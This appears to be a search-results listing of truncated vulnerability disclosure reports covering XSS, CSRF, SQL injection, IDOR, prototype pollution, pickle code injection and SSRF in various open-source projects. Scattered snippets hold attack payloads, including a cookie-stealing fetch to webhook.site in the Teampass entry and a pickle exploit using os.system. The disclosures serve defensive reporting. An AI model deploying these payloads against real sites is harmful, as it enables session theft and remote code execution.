4072 matches found
Code Injection in baidu/cup
Description CUP, common useful python-lib. Currently, Most popular python lib in baidu Vulnerability description untrusted loading of data by the pickle.load function leading to Arbitrary code execution. Proof of Concept Run exploit.py import os import pickle os.system'pip3 install cup' from...
Prototype Pollution in maikelvl/dot-json
Description dot-json is vulnerable to Prototype Pollution. This package allowing for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE. Proof of Concept 1. Create the following PoC file: js // poc.js var dotJson = require"dot-json" var myfile = new...
Prototype Pollution in pierreinglebert/json-merge-patch
Description json-merge-patch is vulnerable to Prototype Pollution. This package fails to restrict access to prototypes of objects, allowing for modification of prototype behavior using a proto payload, which may result in Information Disclosure/DoS/RCE. Proof of Concept 1. Create the following Po...
Insecure Storage of Sensitive Information in smirzaei/rails-session-decoder
Overview rails-session-decoder is a simple utility for decoding Rails 4.x sessions in Node.js, this package are vulnerable to Information Exposure. Missing verification of the Message Authentication Code appended to the cookies may lead to decryption of cipher text, exposing encrypted information...
Code Injection in mahdaen/node-import
Overview node-import is a package that imports dependencies and run it directly or concatenate them and exports to file. This package is vulnerable to Arbitrary Code Execution. The params argument of the module function can be controlled by users without any sanitization. This is then provided to...
Code Injection in strider-cd/strider-git
Overview strider-git allows strider to use any git repository for a project. he issue occurs because a user input is formatted inside a command that will be executed without any check...
Cross-site Scripting (XSS) - Generic in boxbilling/boxbilling
Overview Boxbilling is a free billing & client management software Affected versions of this software are vulnerable to Cross-site Scripting XSS. It is possible to inject JavaScript with object decoding such as alert1 resulting in XSS. Technical Description if we look in...
Incomplete Fix for CVE-2026-1669: HDF5 External Storage File Disclosure in Legacy H5 Loading
Description Keras 3 patched CVE-2026-1669 HDF5 External Storage File Disclosure in the new .keras and .weights.h5 loading paths by adding verifydataset to check for dataset.external in H5IOStore. However, the legacy .h5 loading path keras/src/legacy/saving/legacyh5format.py was not patched. This...
Integer Overflow lead to DOS in handling Accept-Encoding header in API /v2/models/<model-name>/generate
This report is not public...
CSRF Delete Navigation Menu Items
Description CSRF Delete Navigation Menu Items Proof of Concept 1 .Attack sends fake requests to users history.pushState'', '', '/'; document.forms0.submit; 2 .User click, deletes unwanted Navigation Menu Items Payload Poc...
Store XSS in Widgets and pages in instantsoft/icms2
Description I noticed that you filtered the filter very carefully. But there are still some parts you missed Proof of Concept 1 . Login with admin 2 . Go to "http://localhost/o2/admin/menu/itemedit/18" 3 . Insert payload in CSS class 4 . Click save , and go to home page, and Detect store xss in...
Stored XSS in module named "New Submissions"
Description I tested the demo site you provided. I see that there is an Stored XSS vulnerability. I hope you can check and provide a fix as soon as possible. Proof of Concept Link video Poc https://drive.google.com/file/d/1BaAnaZQyfbUTu54rzwRtTevr-wx100/view?usp=sharing Steps 1 .Login as account...
Stored XSS in module named "Create Issues"
Description I tested the demo site you provided. I see that there is an XSS vulnerability. I hope you can check and provide a fix as soon as possible. Proof of Concept link video Poc https://drive.google.com/file/d/1CEEFO0ukhjug6dNRfb-vdQNuBUyezoJp/view?usp=sharing Steps 1 .Login as account demo ...
DOM XSS in https://demo.modoboa.org/user/#profile/
Description I noticed, your website is very secure. But you overlooked a flaw DOM XSS. Detail: 1 .Login with demo account. 2 .Go to the link: https://demo.modoboa.org/user/profile/ and click Update 3 .Use burp to block proxy and inject payload in &language: Proof of Concept Video Poc...
Improver Validation of File Name Causes RCE
Description Due to insufficient sanitization of the music file name, it is possible to execute arbitrary commands on the victims computer, through a specially crafted file name. Note that this bug was only found exploitable only on the MacOS version of this application. Although still applicable ...
Blind SSRF When Uploading Presentation (mitigation bypass)
Description This is actually a bypass of CVE-2023-33176 when i able to perform SSRF to internal network. Proof of Concept As we already know, we can upload files via api /bigbluebutton/api/insertDocument using a remote url. PresentationUrlDownloadServicesavePresentation is the method to handle th...
Insufficient Session Expiration because of lacking of cache check
Description The web application's session management system suffers from an "Insufficient Session Expiration" vulnerability due to the lack of proper cache check. This vulnerability allows a user's session to remain valid even after the user has logged out, potentially granting unauthorized acces...
Vim's embedded terminal allows injection via DECRQSS response
Description DECRQSS is a terminal response that replies with certain information about the terminal. Various terminals have bugs where a piece of data from the request i.e. data that the terminal receives is echoed back in the reply. In some cases this is enough to make it so if untrusted data...
SQL injection in searchArticles function
Description The searchArticles function in the KB module makes a call to the getSimpleResultSet function, with the perpage parameter taken from the user without sanitizing before entering the query, leading to the attacker being able to manipulate the query. Proof of Concept GET...
Stored XSS in Title
Description Spina's admin screen has an embedded XSS in the title of the page. By embedding arbitrary JavaScript code in the function of Paguri, arbitrary scripts can be executed on the browser when the administrator user who accessed the page deletes the page. Proof of Concept Step 1. Access the...
Remote Command Execution by Improper Escaping of Output
Description Improper Encoding or Escaping of Output in Froxlor export configuration. Hackers can use it to create a json file with PHP code inside then trigger the code by set php-fpm to process .json extension. php foreach $POST'system' as $sysdaemon $params'system' = $sysdaemon; $paramscontent ...
Server-Side Template Injection leads to Remote Code Execution
Description Admin or Staff with "Mass mailer" permission can perform a Server-Side Template Injection attack Proof of Concept Log in as an admin or a staff who has "Mass mailer" permission, edit a message In the "Email content" field, insert the following value and click "Update and preview" %...
XSS Filter Bypass in Folder Name leading to Information Disclosure
Description Proof of Concept First, login to Teampass and go to the Folders tab. Create a new folder using Hex entities in the Label. In this case: scriptfetchhttpswebhooksitejlk documentcookiescript which is fetch'https://webhook.site/jlk/' + document.cookie Next, select the created folder and...
Stored XSS in Survey Groups Function
Description By Injecting the payloads to the fields Title, Description, users who visited "Survey list" screen maybe compromises Proof of Concept Step 1: Login as Administrator, go to the "Survey list" screen function, click "create survey group" button. Step 2: Inject the payload to the fields...
IDOR can make attackers add or close others' unavaiable
both user1 and user2 are Providers 1 user1 login and add unavaiable 2 request can be like POST /index.php/backendapi/ajaxsaveunavailable HTTP/1.1...
missing permission check for API /setting/workspace/member/update
Proof of Concept 1 user1 是workspace1的空间管理员 2 user2 是workspace1的成员 3 user1 更新user2的信息,比如将其更新为空间管理员 4 使用burpsuite拦截请求 POST /setting/workspace/member/update HTTP/1.1 Host: 192.168.213.128:8081 Content-Length: 144 Accept-Language: zh-CN WORKSPACE: bd6fc04b-15af-43dc-8cb6-411deaec81a7 User-Agent:...
Improper Authorization in "Customer automation rules" function
Description The product performs authorization checks incorrectly when an unauthorized actor tries to access a resource or perform an actions. Proof of Concept The user does not have permission to delete the rule. Location - GET /admin/customermanagementframework/rules/list - POST...
SQL Injection in expenses/ajax.php & loan-management/ajax.php
Description An administrator user can use different operations and parameters to execute SQL queries. -employeeId on operation addMonthlySalary in expenses/ajax.php. -returnAdvancePaymentEmployee on operation returnAdvancePaymentSubmit, in expenses/ajax.php. -id on operation editLoan in...
Improper Authorization lead a user can accept his answer as the best answer
Description Login as user A and make a question https://meta.answer.dev/questions/D1C7/how-to-set-my-laptop-auto-start-at-particular-time Login as User B and answer this As normal, User A can vote the answer of User B is best answer But with this vuln, User B can call the api POST...
IDOR make users can bind any cluster
Proof of Concept 1 admin create cluster1, cluster2, clusterTag1 and clusterTag2 2 admin add user1 as owner of cluster1,clusterTag1 3 user1 bind clusterTag1 to cluster1 4 user1 use burpsuite hiajck the request 5 the request content can be "clusterTag":"biaoqia4","bindClusters":1 6 change the reque...
Account Owner Email Adrress Leakage Lead To Improper Access Control
Description hi team, when i try to create users for on https://public.tenant.kiwitcms.org/admin/auth/user//change/ i see that the users are not properly authenticated. i can create users with the same firstname,lastname, and email. normally, when we create the same users it should error with the...
Insufficient Filtering Leads to Stored Cross Site Scripting at FAQ
Description Cross-Site Scripting XSS attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a differen...
Able to change admin email and password without current password validation.
Description Able to change admin email and password without current password validation. Change the User%5Buid%5D for the User UID of the current admin user. for the example: uid of the current admin is 1. Then change the other info like User%5Bemail%5D,User%5Bpassword%5D and passwordrepeat for...
Broken Access Control in Vote/Friend Function
Description Unauthorized conduct by modifying, closing/re open a poll created by someone else. Delete friend of other account via id Proof of Concept Step 1: Use account 1 to create a poll\ \ account 2 not have perrmison edit/close/open on poll \ Step 2: Intercept request when account 1 edit,...
IDOR make one user can stop, start , delete, edit others' source
Proof of Concept 1 user1 create a source with id =1 2 user2 create a source with id =2 3 user1 delete the source with post DELETE /inlong/manager/api/source/delete/1?sourceType= HTTP/1.1 4 user1 repalce the 1 as 2, and find that he can sucess delete user2' source...
Improper Restriction of Rendered UI Layers or Frames
Description The osTicket uses an incorrect method to validate the src attribute of the iframe tag. Although it appears that osTicket restricts domains through a whitelist, attackers can easily bypass this restriction. Proof of Concept This iframe is going to render www.youtube.com.attacker's serv...
XML External Entity (XXE) injection in sympy
Description Sympy is an open source platform that a computer algebra system written in pure Python . Sympy is vulnerable to an XML External Entity XXE injection in the applyxsl functionality of Sympy due to the usage of etree.XML. Proof of Concept // PoC.py from sympy.utilities.mathml import...
Stored XSS via name parameter of "Predefined Properties"
Description It's observed that the name parameter of the "Predefined Properties" functionality is vulnerable to stored XSS. Proof of Concept 1.Login to https://demo.pimcore.fun/admin/. 2.Now go to Settings - Predefined Properties - Add and Enter the payload: " inside the name input field. 3.Then...
Autenticated Stored Cross-Site Scripting (XSS)
Description Login to the admin account. Use the following URL http://192.168.0.211/admin.php?action=files or navigate to pages - manage files. Upload the XSS payload with “.html” extension. Intercept the request with Burp Suite. Modify the Content-Type to application/x-php and forward the request...
Multiple XSS @ answer/question/tag
Description The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. Proof of Concept Posting the Question: func req QuestionAdd Check errFields validator.FormErrorField, err error...
Stored XSS in Notification and Data Management
Description Please enter a description of the vulnerability. Proof of Concept 1. Go to a survey and to Settings = Notifications and data. 2. Turn off Inherit option for Send basic notification email to: or Send basic notification email to: 3. Enter the following payload: " and Save...
Rxss in msg parameter
Affected url Affected parameter : msg It appear that html tags are rendered in the page via msg parameter. So I tried tag and it work, so i tried adding event handlers in this case onpageshow=alertdocument.domainand it trigred xss. POC :...
Race Condition Vulnerability can Leads to Up Vote Stealing
Description I tested in the live production site https://meta.answer.dev/. There are up vote / down vote functions in answerdev. An attacker can increase or decrease votes by using race condition vulnerability. Proof of Concept 1. Go to an question and press up vote or down vote. 2. PoC will show...
XSS in /admin/domains when filtering a specific tag
Description Reflected XSS happens when filtering a specific tag in the Domains page and changing the "domfilter" URL query parameter to the malicious string. Proof of Concept 1 - Login as a domain admin 2 - Go to the Domains page 3 - Click on one of the existing tags 4 - Change the domfilter quer...
CSRF, Reflected XSS and Stored XSS in add instance function
Description The add instance function allows to creation of an instance from user input but does not have any sanitizing mechanism which results in a Reflected XSS bug. This feature can be made by any user in the system, including guest users. After creating the instance will be saved on the...
Stored XSS in Your Answer
Description Evil users can attack other users or administrator users through this vulnerability, causing other users/administrator user accounts to be taken over Proof of Concept step1. Insert xss payload in the hyperlink of the question answer javaScript:alertlocalStorage.getItem'alui' step2. An...
CSRF leading to delete account
Description wallabag was discovered to contain a Cross-Site Request Forgery CSRF which allows attackers to arbitrarily delete user accounts via /account/delete. Proof of Concept 1. Create a new user. 2. Login as the new user. 3. Open the following HTML file in the browser. html history.pushState'...
Critical Account Takeover and Privilege Escalation
Description Critical account takeover and privilege escalation vulnerability allow a low privilege user to take over admin account by using change password functionality. In a normal user, select change password Change the user ID to 1 as it is the admin account user ID Admin account is taken ove...
Stored XSS in Search
Description Stored XSS is a type of XSS that stores malicious code on the application. The demo website is affected of it. Proof of Concept 1. Access to the demo website https://demo.usememos.com/ 2. At "Any thoughts....", write XSS Payload and save it. In this scenario, I used payload: " 3. Now,...
Multiple Blind SQL Injection Vulnerabilities in Reports
Description SQL injection typically allows an attacker to extract the entire database from the vulnerable website, including user information, encrypted passwords, and business data. This can subsequently lead to mass compromise of user accounts, data being encrypted and held to ransom, or stolen...